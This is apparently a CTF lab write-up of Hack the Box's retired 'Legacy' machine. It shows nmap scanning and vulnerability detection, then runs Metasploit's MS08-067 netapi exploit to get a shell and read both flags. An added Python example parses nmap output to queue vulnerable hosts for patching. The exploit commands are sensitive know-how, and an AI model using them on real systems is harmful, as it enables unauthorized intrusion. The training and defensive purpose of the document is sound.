Hello friends!! Today we are going to solve another CTF challenge, “Legacy”, a lab presented by Hack the Box for practicing penetration testing online according to your experience level. They have a collection of vulnerable labs as challenges, from beginner to expert level. HTB divides its labs into two groups, Active and Retired. Since we can’t submit a write-up of any Active lab, we have chosen the retired Legacy lab.
Level: Beginners
Task: find the user.txt and root.txt files on the victim’s machine.
Let’s begin the Game!!
Since these labs are available online, they have static IPs. The IP of Legacy is 10.10.10.4, so let’s begin with nmap port enumeration.
nmap -sV 10.10.10.4 --open
From the image below, you can observe that we found open ports 139 and 445, which denotes that it is a Windows machine.
When I extracted the complete result of nmap, I found the following details:
OS: Windows XP
Computer name: Legacy
NetBIOS computer name: Legacy
As we know, in Windows XP port 445 was vulnerable to the netapi exploit, and it was a remarkable vulnerability in the SMB protocol.
Let’s confirm the SMB vulnerability on the victim’s system using an nmap script.
nmap --script vuln -p445 10.10.10.4
Awesome!! The victim’s machine is vulnerable to the MS08-067 exploit.
Then I ran the msfconsole command in the terminal to load the Metasploit Framework and use the ms08_067_netapi module for exploiting the target machine.
use exploit/windows/smb/ms08_067_netapi
msf exploit(windows/smb/ms08_067_netapi) > set rhost 10.10.10.4
msf exploit(windows/smb/ms08_067_netapi) > exploit
Awesome!! I have got unauthorized access to the victim’s command shell through session 1, as shown in the image below.
Inside C:\Documents and Settings\john\Desktop I found the user.txt file and used the cat “file name” command to read it.
cat user.txt
Great!! We got our 1st flag successfully
Inside C:\Documents and Settings\Administrator\Desktop I found the root.txt file and used the cat “file name” command to read it.
cat root.txt
Great!! We got our 2nd flag successfully
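From the defender's side, the nmap --script vuln step above is the useful one to automate: the example below is added here (it is not part of the original write-up) and turns saved nmap output into a list of hosts that need patching. The sample report, the second address 192.0.2.10 and the function names triage and patch_queue are constructed for illustration.

```python
import re

# Constructed sample of nmap normal output (-p445 --script vuln) for two hosts;
# the second address and all result text are illustrative, not captured output.
SAMPLE = """\
Nmap scan report for 10.10.10.4
PORT    STATE SERVICE
445/tcp open  microsoft-ds
Host script results:
| smb-vuln-ms08-067:
|   VULNERABLE:
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|_    State: VULNERABLE
Nmap scan report for 192.0.2.10
PORT    STATE SERVICE
445/tcp open  microsoft-ds
Host script results:
|_smb-vuln-ms08-067: ERROR: Script execution failed (use -d to debug)
"""

HOST = re.compile(r"^Nmap scan report for (\S+)")
PORT = re.compile(r"^(\d+)/tcp\s+open\b")
SCRIPT = re.compile(r"^\|[ _]([A-Za-z0-9-]+):")
STATE = re.compile(r"^\|[ _]\s+State:\s+(.+?)\s*$")

def triage(report):
    """Return {host: {"open": [ports], "vulnerable": [script names]}}."""
    hosts, host, script = {}, None, None
    for line in report.splitlines():
        if m := HOST.match(line):
            host, script = m.group(1), None
            hosts[host] = {"open": [], "vulnerable": []}
        elif host is None:
            continue
        elif m := PORT.match(line):
            hosts[host]["open"].append(int(m.group(1)))
        elif m := SCRIPT.match(line):
            script = m.group(1)          # start of a script's output block
        elif (m := STATE.match(line)) and script:
            # Only an exact VULNERABLE state counts; script errors and
            # "LIKELY VULNERABLE" are left for manual review.
            if m.group(1) == "VULNERABLE":
                hosts[host]["vulnerable"].append(script)
    return hosts

def patch_queue(report):
    """Hosts that expose SMB (139/445) and have a confirmed finding."""
    return sorted(h for h, r in triage(report).items()
                  if r["vulnerable"] and {139, 445} & set(r["open"]))
```

A host whose script run ended in an error, like the second one in the sample, is not queued; it still needs a re-scan before it can be called clean.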